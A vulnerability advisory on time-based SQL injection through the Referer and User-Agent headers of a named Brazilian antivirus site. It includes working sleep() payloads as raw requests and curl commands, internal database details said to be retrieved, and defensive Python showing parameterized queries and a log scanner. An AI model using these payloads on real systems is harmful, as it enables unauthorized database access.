-------------------------
Vulnerable URL: http://www.nod32.com.br
Vulnerable HTTP headers: Referer and User-Agent
### Request (User-Agent)

```http
GET /kb/SOLN2522 HTTP/1.1
Host: www.nod32.com.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0'+(SELECT*FROM(SELECT(sleep(20)))a)+++'
Connection: close
Referer: http://www.nod32.com.br/hogar/cybersecurity-pro-mac
Cookie: PHPSESSID=47f1dadd26c823d0a7be9215d2befb97
```

### Request (Referer)

```http
GET /kb/SOLN2522 HTTP/1.1
Host: www.nod32.com.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0
Connection: close
Referer: http://www.nod32.com.br/hogar/cybersecurity-pro-mac'+++++++(SELECT*FROM(SELECT(sleep(20)))a)+++'
Cookie: PHPSESSID=47f1dadd26c823d0a7be9215d2befb97
```
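The root cause behind both requests is the same: a header value is spliced into SQL text, so a single quote in the header ends the string literal and everything after it is parsed as SQL. The following added example (not code from the advisory or from the affected site) shows that pattern next to its fix. It assumes a hypothetical visit-logging routine and uses SQLite in memory; the `sleep()` call from the advisory is replaced by the constant `1` because SQLite has no `sleep()`, but the mechanism is identical to the MySQL case.

```python
import sqlite3

# Constructed sample header values. INJECTED_UA has the shape of the advisory's
# User-Agent payload with sleep(20) swapped for the constant 1 (SQLite has no sleep()).
INJECTED_UA = "Firefox/55.0'+(SELECT*FROM(SELECT(1))a)+'"
BENIGN_UA = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"


def _fresh_db():
    """Hypothetical visits table, as a site might keep for analytics."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visits (id INTEGER PRIMARY KEY, path TEXT, user_agent TEXT)")
    return conn


def log_visit_vulnerable(conn, path, user_agent):
    # Vulnerable form: the header text becomes part of the SQL statement itself,
    # so a quote inside it ends the literal and the rest is executed as SQL.
    sql = "INSERT INTO visits (path, user_agent) VALUES ('%s', '%s')" % (path, user_agent)
    conn.execute(sql)
    conn.commit()


def log_visit_safe(conn, path, user_agent):
    # Hardened form: placeholders send the value separately from the statement,
    # so the driver never parses the header as SQL, whatever it contains.
    conn.execute("INSERT INTO visits (path, user_agent) VALUES (?, ?)", (path, user_agent))
    conn.commit()


def stored_user_agent(conn):
    return conn.execute("SELECT user_agent FROM visits ORDER BY id DESC LIMIT 1").fetchone()[0]


def compare(user_agent):
    """Return (value stored by the vulnerable code, value stored by the safe code)."""
    vuln = _fresh_db()
    log_visit_vulnerable(vuln, "/kb/SOLN2522", user_agent)
    safe = _fresh_db()
    log_visit_safe(safe, "/kb/SOLN2522", user_agent)
    return stored_user_agent(vuln), stored_user_agent(safe)


if __name__ == "__main__":
    print("benign  :", compare(BENIGN_UA))
    print("injected:", compare(INJECTED_UA))
```

With the benign User-Agent both routines store the same string. With the injected one the vulnerable routine stores the result of evaluating `'Firefox/55.0'+(SELECT*FROM(SELECT(1))a)+''` as an SQL expression rather than the header text, which is exactly the behaviour that lets a `sleep()` subquery run on MySQL; the parameterized routine stores the header verbatim. Prepared statements (`mysqli`/PDO with bound parameters in PHP) are the fix; filtering header values is not a substitute.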
### Proof of Concept
For the proof of concept, the following data was retrieved from the affected database:
HostName: 798348-db2.eset.com
DBMS: MySQL 5.6.31
DB User: esetla_otros@192.168.103.108
Current DB: esetla_otros
DBA Privileges: False
DBs: esetla_pol, esetsa_uyrps, infproayoon_schema
### Multiple Time Based SQL Injection

```
$ time curl -e "http://www.nod32.com.br/hogar/cybersecurity-pro-mac'+++++++(SELECT*FROM(SELECT(sleep(20)))a)+++'" "http://www.nod32.com.br/kb/SOLN2522"
real 0m20,403s
user 0m0,008s
sys 0m0,004s

$ time curl -e "http://www.nod32.com.br/hogar/cybersecurity-pro-mac'+++++++(SELECT*FROM(SELECT(sleep(10)))a)+++'" "http://www.nod32.com.br/kb/SOLN2522"
real 0m10,320s
user 0m0,004s
sys 0m0,008s

$ time curl -e "http://www.nod32.com.br/hogar/cybersecurity-pro-mac'+++++++(SELECT*FROM(SELECT(sleep(5)))a)+++'" "http://www.nod32.com.br/kb/SOLN2522"
real 0m5,318s
user 0m0,008s
sys 0m0,004s
```
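Time-based injection through headers leaves two traces in a web server's access log: the payload itself in the logged Referer or User-Agent, and a response time that tracks the `sleep()` argument, as the timings above show. The following added example (not part of the advisory) scans constructed nginx-style log lines (combined format with `$request_time` appended, a common customisation that is assumed here) for both signals and rates a hit higher when a suspicious header coincides with a slow response. The delay-function list covers MySQL, PostgreSQL and MSSQL idioms; the 5 s threshold is an assumption to tune per site.

```python
import re

# Constructed sample lines. Lines 3 and 4 carry the advisory's Referer and
# User-Agent payloads respectively, with response times matching the curl timings.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2017:12:00:01 +0000] "GET /kb/SOLN2522 HTTP/1.1" 200 5120 "http://www.nod32.com.br/hogar/cybersecurity-pro-mac" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0" 0.041
198.51.100.9 - - [10/Oct/2017:12:00:03 +0000] "GET /kb/SOLN2522 HTTP/1.1" 200 5120 "-" "curl/7.54.0" 0.038
203.0.113.5 - - [10/Oct/2017:12:00:25 +0000] "GET /kb/SOLN2522 HTTP/1.1" 200 5120 "http://www.nod32.com.br/hogar/cybersecurity-pro-mac'+++++++(SELECT*FROM(SELECT(sleep(20)))a)+++'" "curl/7.54.0" 20.403
203.0.113.5 - - [10/Oct/2017:12:00:40 +0000] "GET /kb/SOLN2522 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0'+(SELECT*FROM(SELECT(sleep(10)))a)+++'" 10.320
"""

# Combined log format plus a trailing $request_time field (assumed log layout).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)" (?P<rt>[\d.]+)$'
)

# Delay primitives used in time-based injection across common DBMSs.
TIME_FUNCS = re.compile(r"(?i)\b(sleep|benchmark|pg_sleep)\s*\(|waitfor\s+delay")
# A quote that closes a string literal and is followed by an SQL keyword.
QUOTE_THEN_SQL = re.compile(r"(?i)'[\s+]*\(?\s*(select|union|or|and)\b")
SLOW_SECONDS = 5.0  # assumed threshold; well above this site's normal ~40 ms


def parse_line(line):
    """Return the log fields as a dict, or None if the line does not match the layout."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["rt"] = float(entry["rt"])
    return entry


def inspect_entry(entry):
    """Return (severity or None, list of reasons) for one parsed log entry."""
    reasons = []
    for header in ("referer", "ua"):
        value = entry[header]
        if TIME_FUNCS.search(value):
            reasons.append(f"{header}: time-delay function in header")
        elif QUOTE_THEN_SQL.search(value):
            reasons.append(f"{header}: quote followed by SQL keyword")
    header_hit = bool(reasons)
    if entry["rt"] >= SLOW_SECONDS:
        reasons.append(f"slow response ({entry['rt']:.3f}s)")
    # Suspicious header plus a slow response suggests the delay actually executed.
    if header_hit and entry["rt"] >= SLOW_SECONDS:
        severity = "high"
    elif header_hit:
        severity = "medium"
    else:
        severity = None
    return severity, reasons


def scan_log(text):
    """Scan log text and return one finding per entry that looks like header SQLi."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        severity, reasons = inspect_entry(entry)
        if severity:
            findings.append({"ip": entry["ip"], "ts": entry["ts"],
                             "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["severity"], finding["ip"], finding["ts"], "; ".join(finding["reasons"]))
```

The two benign lines produce nothing; the two payload lines are rated `high` because the header indicator and the multi-second response time coincide. A slow response on its own is only recorded as a reason, not a finding, since ordinary load spikes would otherwise flood the output.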